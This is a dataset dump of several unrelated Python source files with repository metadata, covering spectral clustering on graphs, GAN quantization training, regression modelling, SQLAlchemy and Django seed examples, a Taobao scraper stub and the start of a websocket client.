reorder_clusters(cluster_labels)\n\n\ndef scml(\n graphs: List[csr_matrix],\n n_clust: int,\n device: torch.device,\n alpha: float = 0.1,\n random_state: int = 12345678,\n) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"\n Perform the spectral clustering on multilayer graphs for a list of graph\n adjacency matrices.\n \n Arguments:\n graphs : A list of sparse csr_matrix corresponding to the graph\n adjacency matrices.\n n_clust : The number of clusters to use for clustering\n device : A PyTorch device to use for obtaining the nearest neighbors\n alpha : A weight to use for the penalty term for the distances to the\n individual subspaces\n \n Returns:\n vals_scml : The eigenvalues of the scml matrix\n vecs_scml : The eigenvectors of the scml matrix (as the columns)\n cluster_labels : The scml cluster labels for each cell\n \n \"\"\"\n \n L, eig_vals, eig_vecs = sparse_spectral(graphs[0], n_clust, random_state)\n L_scml = L.toarray() - alpha * (eig_vecs @ eig_vecs.T)\n \n for G in graphs[1:]:\n L, eig_vals, eig_vecs = sparse_spectral(G, n_clust, random_state)\n L_scml += (L.toarray() - alpha * (eig_vecs @ eig_vecs.T))\n \n L_scml = torch.from_numpy(L_scml).to(device)\n vals_scml, vecs_scml = torch.linalg.eigh(L_scml)\n \n vals_scml = vals_scml.cpu().numpy()\n vecs_scml = vecs_scml.cpu().numpy()\n \n cluster_labels = spectral_clustering(vecs_scml, n_clust, random_state)\n \n return vals_scml, vecs_scml, cluster_labels\n\n\ndef full_spectral(\n A: csr_matrix,\n device: torch.device,\n) -> Tuple[torch.tensor, torch.tensor, torch.tensor]:\n \"\"\"\n Spectral decomposition for a sparse adjacency matrix A.\n \n Arguments:\n A : The sparse adjacency matrix\n n_clust : The number of eigenvalues and corresponding eigenvectors\n to return\n Returns:\n L : The symmetric graph Laplacian stored as a PyTorch tensor object\n eig_vals : The eigenvalues of the symmetric graph Laplacian\n eig_vecs : The eigenvectors of the symmetric graph Laplacian\n \n \"\"\"\n \n D = diags(np.array(A.sum(axis=1))[:,0]).tocsr()\n D1_2 = D.sqrt().power(-1)\n \n L = D1_2 * (D - A) * D1_2\n L = torch.from_numpy(L.toarray()).to(device)\n \n 
eig_vals, eig_vecs = torch.linalg.eigh(L)\n \n return L, eig_vals, eig_vecs\n \n\ndef density_matrix(\n eig_vals: torch.Tensor,\n eig_vecs: torch.Tensor,\n beta: float,\n) -> torch.Tensor:\n \"\"\"\n Construct the density matrix from the spectrum and corresponding\n eigenvectors of the symmetric graph Laplacian.\n \n Arguments:\n eig_vals : Eigenvalues of the symmetric graph Laplacian\n eig_vecs : Eigenvectors of the symmetric graph Laplacian\n beta : Inverse temperature parameter. Larger values will suppress\n the contribution of eigenvector directions with larger eigenvalues\n \n Returns:\n rho / Z : The density matrix\n \n \"\"\"\n\n P = torch.exp(-beta * eig_vals)\n rho = eig_vecs * P\n rho = rho @ eig_vecs.T\n Z = torch.trace(rho)\n \n return rho / Z\n\n \ndef soft_scml(\n graphs: List[csr_matrix],\n n_clust: int,\n device: torch.device,\n alpha: float = 0.1,\n beta: float = None,\n random_state: int = 12345678,\n) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"\n Perform the soft scml embedding and clustering.\n \n Arguments:\n graphs : A list of sparse csr_matrix corresponding to the graph\n adjacency matrices.\n n_clust : The number of clusters to use for clustering\n device : A PyTorch device to use for obtaining the nearest neighbors\n alpha : A weight to use for the penalty term for the distances to the\n individual subspaces\n beta : Inverse temperature parameter. Larger values will suppress\n the contribution of eigenvector directions with larger eigenvalues\n random_state : A random state to use for initializing the k-means\n search\n \n Returns:\n vals_scml : The eigenvalues of the soft scml matrix\n vecs_scml : The eigenvectors of the soft scml matrix (as the columns)\n cluster_labels : The soft scml cluster labels for each cell\n \n \"\"\"\n \n N = graphs[0].shape[0]\n if beta is None:\n beta = np.sqrt(N)\n \n L_scml, eig_vals, eig_vecs = full_spectral(graphs[0], device)\n rho = density_matrix(eig_vals, eig_vecs, beta)\n del eig_vecs, eig_vals\n L_scml -= alpha * rho\n del rho\n \n for G in graphs[1:]:\n L, eig_vals, eig_vecs = full_spectral(G, device)\n L_scml += L\n del L\n rho = density_matrix(eig_vals, eig_vecs, beta)\n del eig_vecs, eig_vals\n L_scml -= alpha * rho\n del rho\n \n vals_scml, vecs_scml = torch.linalg.eigh(L_scml)\n del L_scml\n vals_scml = vals_scml.cpu().numpy()\n vecs_scml = vecs_scml.cpu().numpy()\n \n cluster_labels = spectral_clustering(vecs_scml, n_clust, random_state)\n \n return vals_scml, vecs_scml, cluster_labels\n\n\n\n \n ", "repo_name": "jssong-lab/sc-spectrum", "sub_path": "src/sc_spectrum/scml.py", "file_name": "scml.py", "file_ext": "py", "file_size_in_byte": 9933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.ndarray", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 57, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 78, "usage_type": "call"}, {"api_name": 
"numpy.array", "line_number": 64, "usage_type": "attribute"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 93, "usage_type": "name"}, {"api_name": "numpy.random.default_rng", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "scipy.sparse.diags", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.eigsh", "line_number": 120, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 96, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 129, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 159, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 159, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 161, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.linalg.eigh", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.linalg", "line_number": 192, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 164, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 164, "usage_type": "attribute"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 203, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 204, "usage_type": "attribute"}, {"api_name": "scipy.sparse.diags", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.linalg.eigh", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.linalg", "line_number": 226, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 205, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 232, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 233, "usage_type": "attribute"}, {"api_name": "torch.exp", "line_number": 251, "usage_type": "call"}, {"api_name": "torch.trace", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 235, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 260, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 262, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.linalg.eigh", "line_number": 308, "usage_type": "call"}, {"api_name": "torch.linalg", "line_number": 308, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 266, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 266, "usage_type": "attribute"}]} +{"seq_id": "16144950800", "text": "import time\nfrom collections import OrderedDict\nfrom options.train_Q_options 
import TrainOptions\nfrom data.data_loader import CreateDataLoader\nfrom models.models import create_model\nimport util.util as util\nfrom util.visualizer import Visualizer\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport copy\nfrom torch.utils.tensorboard import SummaryWriter\nfrom sklearn.cluster import KMeans\nimport numpy as np\nimport torch.nn.functional as F\n\n\nopt = TrainOptions().parse()\niter_path = os.path.join(opt.checkpoints_dir, opt.name, 'iter.txt')\nintial_flag = True\nopt.model = 'Bpgan_GAN_Q'\nif opt.continue_train:\n try:\n start_epoch, epoch_iter = np.loadtxt(iter_path, delimiter=',', dtype=int)\n except:\n start_epoch, epoch_iter = 1, 0\n print('Resuming from epoch %d at iteration %d' % (start_epoch, epoch_iter))\n Temp = (opt.Q_final - opt.Q_init_Temp)/(opt.Q_hard_epoch-opt.Q_train_epoch) *(start_epoch-opt.Q_train_epoch)+opt.Q_init_Temp\n if start_epoch >= opt.Q_train_epoch:\n intial_flag = False\nelse:\n start_epoch, epoch_iter = 1, 0\nif opt.debug:\n opt.batchSize=2\n opt.display_freq = 1\n opt.print_freq = 1\n opt.niter = 100\n opt.niter_decay = 50\n opt.max_dataset_size = 10\ndata_loader = CreateDataLoader(opt)\ndataset = data_loader.load_data()\ndataset_size = len(data_loader)\nprint('#training images = %d' % dataset_size)\n\nmodel = create_model(opt)\nvisualizer = Visualizer(opt)\nsummary_path = os.path.join(opt.checkpoints_dir,opt.name,'logs/')\nwritter = SummaryWriter(log_dir=summary_path)\ntotal_steps = (start_epoch - 1) * dataset_size + epoch_iter\nrandom_index = 20\n\nimtype = np.uint8 if opt.image_bit_num==8 else np.uint16\n\n\ndef train(data, epoch, total_steps, epoch_iter, Q_type):\n iter_start_time = time.time()\n total_steps += opt.batchSize\n epoch_iter += opt.batchSize\n\n # whether to collect output images\n save_fake = total_steps % opt.display_freq == 0\n\n ############## Forward Pass ######################\n fake_image = model(Variable(data['label']), Q_type=Q_type)\n real_image = data['image'].cuda()\n\n loss_D_fake = 0\n loss_D_real = 0\n loss_G_GAN = 0\n\n model.module.optimizer_G.zero_grad()\n criterionGAN = nn.BCEWithLogitsLoss()\n if not opt.no_gan_loss:\n model.module.optimizer_D.zero_grad()\n\n # Fake Detection and Loss\n pred_fake_pool = model.module.discriminate(fake_image)[0][0]\n #loss_D_fake = opt.lambda_gan * F.relu(1.0 + pred_fake_pool).mean()#self.criterionGAN(pred_fake_pool, False) \n loss_D_fake = opt.lambda_gan * criterionGAN(pred_fake_pool, torch.zeros_like(pred_fake_pool))\n\n # Real Detection and Loss \n pred_real = model.module.discriminate(real_image)[0][0]\n #loss_D_real = opt.lambda_gan * F.relu(1.0 - pred_real).mean()\n loss_D_real = opt.lambda_gan * criterionGAN(pred_real, torch.ones_like(pred_real))\n\n loss_D = loss_D_fake + loss_D_real\n loss_D.backward()\n\n model.module.optimizer_D.step()\n\n # GAN loss (Fake Passability Loss) \n pred_fake = model.module.netD.forward(fake_image)[0][0]\n #loss_G_GAN = - opt.lambda_gan * pred_fake.mean()\n loss_G_GAN = opt.lambda_gan * criterionGAN(pred_fake, torch.ones_like(pred_fake))\n \n # GAN feature matching loss\n loss_G_GAN_Feat = 0\n if not opt.no_gan_loss and not opt.no_ganFeat_loss:\n pass\n \"\"\"\n feat_weights = 4.0 / (self.opt.n_layers_D + 1)\n D_weights = 1.0 / self.opt.num_D\n for i in range(self.opt.num_D):\n for j in range(len(pred_fake[i])-1):\n loss_G_GAN_Feat += D_weights * feat_weights * \\\n self.criterionFeat(pred_fake[i][j], pred_real[i][j].detach()) * self.opt.lambda_feat\n \"\"\"\n \n # VGG 
feature matching loss\n loss_G_VGG = 0\n if not opt.no_vgg_loss:\n loss_G_VGG = model.module.criterionVGG(fake_image, real_image) * opt.lambda_feat\n loss_mse = 0\n if not opt.no_mse_loss:\n loss_mse = model.module.criterion_mse(fake_image,real_image) * opt.lambda_mse\n \n\n loss_G = loss_G_GAN + loss_G_GAN_Feat + loss_G_VGG + loss_mse\n \n ############### Backward Pass ####################\n # update generator weights\n loss_G.backward()\n model.module.optimizer_G.step()\n\n loss_dict = {'D_fake': loss_D_fake,\n 'D_real': loss_D_real,\n 'G_GAN': loss_G_GAN,\n 'G_GAN_Feat': loss_G_GAN_Feat,\n 'Feature': loss_G_VGG,\n 'MSE_Loss': loss_mse\n }\n\n ############## Display results and errors ##########\n ### print out errors\n if total_steps % opt.print_freq == 0:\n errors = {k: v.data.item() if not isinstance(v, int) else v for k, v in loss_dict.items()}\n t = (time.time() - iter_start_time) / opt.batchSize\n visualizer.print_current_errors(epoch, epoch_iter, errors, t)\n #visualizer.plot_current_errors(errors, total_steps)\n ### display output images\n if save_fake:\n visuals = OrderedDict([('input_label', util.tensor2label(data['label'][0], 0, imtype)),\n ('synthesized_image', util.tensor2im(fake_image.data[0], imtype))])\n visualizer.display_current_results(visuals, epoch, total_steps)\n\n ### save latest model\n if total_steps % opt.save_latest_freq == 0:\n print('saving the latest model (epoch %d, total_steps %d)' % (epoch, total_steps))\n model.module.save('latest')\n np.savetxt(iter_path, (epoch, epoch_iter), delimiter=',', fmt='%d')\n\n return total_steps, epoch_iter\n\n\nfor epoch in range(start_epoch, opt.niter + opt.niter_decay + 1):\n epoch_start_time = time.time()\n if epoch != start_epoch:\n epoch_iter = epoch_iter % dataset_size\n if epoch < opt.Q_train_epoch:\n for i, data in enumerate(dataset, start=epoch_iter):\n total_steps, epoch_iter = train(data, epoch, total_steps, epoch_iter, \"None\")\n\n elif epoch >= opt.Q_train_epoch and epoch < opt.Q_hard_epoch:\n if epoch == opt.Q_train_epoch:\n model.module.save('floating_final')\n if intial_flag:\n intial_flag = False\n\n center = torch.linspace(0, 1, opt.n_cluster).cuda()\n model.module.update_center(center)\n model.module.netE.train()\n for i, data in enumerate(dataset, start=epoch_iter):\n total_steps, epoch_iter = train(data, epoch, total_steps, epoch_iter, \"Soft\")\n else:\n if epoch == opt.Q_hard_epoch:\n model.module.save('Q_soft')\n model.module.netE.train()\n for i, data in enumerate(dataset, start=epoch_iter):\n total_steps, epoch_iter = train(data, epoch, total_steps, epoch_iter, \"Hard\")\n \n # end of epoch\n iter_end_time = time.time()\n print('End of epoch %d / %d \\t Time Taken: %d sec' %\n (epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))\n ### save model for this epoch\n if epoch % opt.save_epoch_freq == 0:\n print('saving the model at the end of epoch %d, iters %d' % (epoch, total_steps))\n model.module.save('latest')\n model.module.save(epoch)\n np.savetxt(iter_path, (epoch + 1, 0), delimiter=',', fmt='%d')\n\n ### linearly decay learning rate after certain iterations\n #if epoch > opt.niter:\n # model.module.update_learning_rate()\n if epoch % 100 == 0:\n model.module.update_learning_rate_custom()\n if epoch >= opt.Q_train_epoch and epoch < opt.Q_hard_epoch:\n Temp = (opt.Q_final - opt.Q_init_Temp) / (opt.Q_hard_epoch - opt.Q_train_epoch) * (\n epoch - opt.Q_train_epoch) + opt.Q_init_Temp\n model.module.update_Temp(Temp)\n print('Temp is %f'%(Temp))\nwritter.close()\n", "repo_name": 
"BowenL0218/BPGAN_Light_Weight", "sub_path": "train_Q.py", "file_name": "train_Q.py", "file_ext": "py", "file_size_in_byte": 7871, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "options.train_Q_options.TrainOptions", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 26, "usage_type": "call"}, {"api_name": "data.data_loader.CreateDataLoader", "line_number": 42, "usage_type": "call"}, {"api_name": "models.models.create_model", "line_number": 47, "usage_type": "call"}, {"api_name": "util.visualizer.Visualizer", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 54, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 66, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 66, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.BCEWithLogitsLoss", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.zeros_like", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 96, "usage_type": "call"}, {"api_name": "time.time", "line_number": 139, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 144, "usage_type": "call"}, {"api_name": "util.util.tensor2label", "line_number": 144, "usage_type": "call"}, {"api_name": "util.util", "line_number": 144, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 144, "usage_type": "name"}, {"api_name": "util.util.tensor2im", "line_number": 145, "usage_type": "call"}, {"api_name": "util.util", "line_number": 145, "usage_type": "name"}, {"api_name": "numpy.savetxt", "line_number": 152, "usage_type": "call"}, {"api_name": "time.time", "line_number": 158, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 162, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 163, "usage_type": "argument"}, {"api_name": "torch.linspace", "line_number": 171, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 174, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 175, "usage_type": "argument"}, {"api_name": "data.data_loader", "line_number": 180, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 181, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "time.time", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "26141203307", "text": "import pandas as pd\nimport numpy as np\nfrom dataHandler import DataLoader\nfrom sklearn.multioutput import MultiOutputRegressor\nfrom sklearn.linear_model import Ridge, LinearRegression\nfrom sklearn.ensemble 
import RandomForestRegressor\n\ndef linear(X,X_,y,y_):\n clf = Ridge(normalize=True).fit(X, y)\n pred = np.array(clf.predict(X_))\n pred = np.around(pred, 1).tolist()\n print(pred[:20])\n print(np.around(y_.values[:20], 1).tolist())\n print(clf.score(X_, y_))\n\n reg = LinearRegression(normalize=True).fit(X,y)\n lpred = np.array(reg.predict(X_))\n lpred = np.around(lpred, 1).tolist()\n print(lpred[:20])\n print(np.around(y_.values[:20], 1).tolist())\n print(reg.score(X_, y_))\n\n\ndef randomForest(X,y):\n max_depth = 25\n regr_multirf = MultiOutputRegressor(RandomForestRegressor(n_estimators=100, max_depth=max_depth, random_state=45))\n clf = regr_multirf.fit(X,y)\n return clf\n\n\nif __name__ == '__main__':\n dl = DataLoader()\n dl.load(\"datasets/train.csv\")\n X, X_, y, y_ = dl.split()\n dl.process()\n reg = randomForest(X,y)\n tdl = DataLoader()\n tdl.load(\"datasets/test.csv\",isTest=True)\n tdl.process()\n pred = np.array( reg.predict(tdl.sensor))\n date = tdl.dataset.date_time.to_numpy().reshape(-1,1)\n data = np.concatenate((date,pred),axis=1)\n result = pd.DataFrame(data,columns=[\"date_time\",\"target_carbon_monoxide\",\"target_benzene\",\"target_nitrogen_oxides\"])\n result.to_csv(\"datasets/result.csv\",index=False)\n\n", "repo_name": "RJRL12138/Regression-Examples", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.linear_model.Ridge", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.multioutput.MultiOutputRegressor", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 26, "usage_type": "call"}, {"api_name": "dataHandler.DataLoader", "line_number": 32, "usage_type": "call"}, {"api_name": "dataHandler.DataLoader", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "2568870677", "text": "from sqlalchemy import create_engine, Column, Integer, String, or_, and_, not_, desc, asc\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///final.db', echo=True)\n# create_engine('postgresql:///dakshbindal:123@localhost:5432/python_test')\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n\n\nclass User(Base):\n __tablename__ = 'users'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n fullname = Column(String)\n lastname = Column(String)\n\n def __repr__(self):\n return \"<User(name='%s', fullname='%s', lastname='%s')>\" % (self.name, self.fullname, self.lastname)\n\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)\n\n# user_a = User(name=\"hello\", 
fullname=\"Daksh\", lastname=\"Bindal\")\n# session.add(user_a)\n# session.commit()\n# session.close()\n\n# rows=session.query(User).get(1)\n# rows_where=session.query(User).filter(User.name == 'hello')\n# print(rows)\n# print(session.query(User).filter(or_(User.name == 'hello', User.lastname.ilike('a%'))).all())\nprint(session.query(User).order_by(desc(User.id)).all())", "repo_name": "Rashi-Gupta-2000/Python_DB_Innogeeks", "sub_path": "Alchemy/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 5, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 7, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 14, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 17, "usage_type": "argument"}, {"api_name": "sqlalchemy.desc", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "13408061410", "text": "import uuid\nfrom faker import Faker\nfrom django.conf import settings\nfrom sotinyurl.tinyurls.models import TinyUrl\nfrom django.utils.timezone import now\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\ntiny = TinyUrl()\nfake = Faker()\nenv_name = settings.ENV_NAME or None\n\nif env_name == \"local\" and not User.objects.filter(username=\"admin\").exists():\n print (\"Create local superuser\")\n User.objects.create_superuser(\n username=\"admin\",\n email=\"admin@example.com\",\n password=\"admin\"\n )\n\nprint (\"Create Random Tiny Urls\")\nbulk_list = [\n TinyUrl(\n tiny_url=tiny._TinyUrl__generate_random_tiny_url(),\n redirect_to=fake.url(),\n created_at=now(),\n updated_at=now(),\n id=uuid.uuid4()\n )\n for x in range(10000)\n]\nTinyUrl.objects.bulk_create(bulk_list)\n", "repo_name": "michal-stachura/example-tinyurlapp", "sub_path": "sotinyurl/utils/seed.py", "file_name": "seed.py", "file_ext": "py", "file_size_in_byte": 842, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 8, "usage_type": "call"}, {"api_name": "sotinyurl.tinyurls.models.TinyUrl", "line_number": 10, "usage_type": "call"}, {"api_name": "faker.Faker", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.settings.ENV_NAME", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "sotinyurl.tinyurls.models.TinyUrl", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 27, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 28, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 29, "usage_type": "call"}, {"api_name": 
"sotinyurl.tinyurls.models.TinyUrl.objects.bulk_create", "line_number": 33, "usage_type": "call"}, {"api_name": "sotinyurl.tinyurls.models.TinyUrl.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sotinyurl.tinyurls.models.TinyUrl", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "39641318097", "text": "from handle.website.base import Base\nfrom common.private_logging import Logging\nfrom common.private_time import Time\n\n\nclass AccountDay(Base):\n def operation_page(self):\n self.driver.get('https://branding.taobao.com/#!/report/index?productid=101005202&effect=15&startdate=2019-06-05&enddate=2019-06-19')\n Time.sleep(3)\n self.driver.find_element_by_xpath('//*[@id=\"brix_12290\"]/div[4]/a').click()\n Time.sleep(3)\n self.wait_download_finish()\n Logging.info(self.source_data_list)\n Logging.info('end')\n\n def operation_data_process(self):\n Logging.info(self.data_list)\n Logging.info('operation_data_process')\n\n\nif __name__ == '__main__':\n store_id = 20\n page_data_id = 10\n port = 9000\n # step1:初始化爬虫任务所需的信息(统一)\n accountDay = AccountDay(store_id, page_data_id, port)\n # step2:页面操作含取数,获取:self.source_data/self.file_names(定制开发)\n accountDay.operation_page()\n # step3:数据处理(定制开发)\n accountDay.operation_data_process()\n # step4:数据入库(统一)\n # accountDay.operation_data_input()\n # step5:目前只针对下载文件 进行数据备份(针对文件下载类取数)(统一)\n # accountDay.operation_data_backup()\n", "repo_name": "2659910409/EC_Spider", "sub_path": "handle/website/branding/starstore_report.py", "file_name": "starstore_report.py", "file_ext": "py", "file_size_in_byte": 1298, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "handle.website.base.Base", "line_number": 6, "usage_type": "name"}, {"api_name": "common.private_time.Time.sleep", "line_number": 9, "usage_type": "call"}, {"api_name": "common.private_time.Time", "line_number": 9, "usage_type": "name"}, {"api_name": "common.private_time.Time.sleep", "line_number": 11, "usage_type": "call"}, {"api_name": "common.private_time.Time", "line_number": 11, "usage_type": "name"}, {"api_name": "common.private_logging.Logging.info", "line_number": 13, "usage_type": "call"}, {"api_name": "common.private_logging.Logging", "line_number": 13, "usage_type": "name"}, {"api_name": "common.private_logging.Logging.info", "line_number": 14, "usage_type": "call"}, {"api_name": "common.private_logging.Logging", "line_number": 14, "usage_type": "name"}, {"api_name": "common.private_logging.Logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "common.private_logging.Logging", "line_number": 17, "usage_type": "name"}, {"api_name": "common.private_logging.Logging.info", "line_number": 18, "usage_type": "call"}, {"api_name": "common.private_logging.Logging", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "15763358249", "text": "import json\nimport random\nimport sys\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, List, Tuple\n\nimport websockets\n\nsys.path.insert(0, str(Path(__file__).parent.parent.parent))\nfrom enhancers import ciphers # noqa: E402\nfrom enhancers.message_processer import ( # noqa: E402\n AutoCorrecter, AutoTranslater\n)\n\n# ADD\nDOMAIN = \"ws://192.155.88.143:5005\"\n# DOMAIN = \"ws://localhost:5000\"\nROUTE = \"/ws\"\nURL = DOMAIN + ROUTE\n\nautocorrecter = AutoCorrecter()\nautotranslater = AutoTranslater()\n\n\n# add what ip to connect to in the constructor?\nclass SocketClient:\n \"\"\"API Wrapper that handles all client side 
